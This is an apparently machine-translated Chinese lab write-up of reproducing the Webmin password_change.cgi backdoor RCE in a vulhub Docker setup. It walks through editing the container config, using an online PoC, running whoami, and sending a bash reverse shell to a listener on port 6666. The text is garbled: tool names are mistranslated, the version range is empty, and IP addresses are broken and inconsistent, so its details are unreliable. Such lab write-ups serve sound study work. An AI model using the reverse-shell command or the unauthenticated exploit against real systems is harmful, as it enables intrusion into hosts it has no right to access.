漏洞描述
最近,webmin被发现存在远程命令执行漏洞。经过分析,初步猜测是后门植入事件。webmin是目前最强大的基于web的unix系统管理工具。管理员可以通过浏览器访问webmin的各种管理功能,完成相应的管理动作。当用户打开webmin的密码重置功能时,攻击者可以通过发送post请求在目标系统中执行任意命令,而无需进行身份验证。
影响范围:webmin<>
漏洞重现
进入vuhub后,直接执行docker-compose up -d拉镜构造。
建好之后直接访问192.168.1.1:10000。但是vuhub建的网站有问题,根据它报错的提示修改一下还是挺有必要的。所以在这里,你需要使用https来访问它,否则你不会被授予访问权限:https://192.168.1.1:10000/
那就是我们的利用了。访问https://192 . 168 . 67 . 135:10000/password _ change . CGI,这种情况下访问会出错,所以这里需要修改配置文件。
然后进入后台修改配置文件。这种情况下直接用docker exec it id号/bin/bash就可以了。
转到/etc/webmin目录并检查配置文件。我们要修改的是config中references _ one = 1的配置。
但是在docker容器中,它没有编辑器,所以在这里,我们需要安装一个vim编辑器。
Cat /etc/os-release首先进入容器检查发行版,确定是使用yum还是apt安装工具。
可以看到用的debian8的操作系统,然后apt安装,apt安装vim。
然后编辑配置文件,将references _ one = 1更改为references _ one = 0。
然后访问那个路径,可以看到我们这边的页面也相应的发生了变化,已经停止报错了。
然后,接下来的事情就是使用poc来重现漏洞。这种情况下,访问https://192 . 168 . 1 . 1:10000/password _ change . CGI,用打嗝抓取包。
使用在线poc,您可以看到该命令已成功执行
看到效果后,很明显命令执行成功了。
执行一个whoami,它也成功地在这里输出相应的权限。
然后我们要弹回shell,因为它可以在这里执行execute命令,然后我们可以直接执行bash-c “bash-I >& amp/dev/TCP/192 . 168 . 1 . 1/6666 0 >& amp1”接收外壳服务器的端口6666)
然后,执行这个命令,然后我们的服务器会**6666,收到弹回的shell。这里,一方面需要将有效载荷编码到url中,然后执行它。
那边的服务器**从端口6666返回的shell,我们可以看到我们执行的有效负载。右边的页面是白色空,表示成功了。
然后就可以看到成功的反弹了。一颗炮弹来了。
本文来自卿尘投稿,不代表舒华文档立场,如若转载,请注明出处:https://www.chinashuhua.cn/24/623567.html
微信扫一扫 
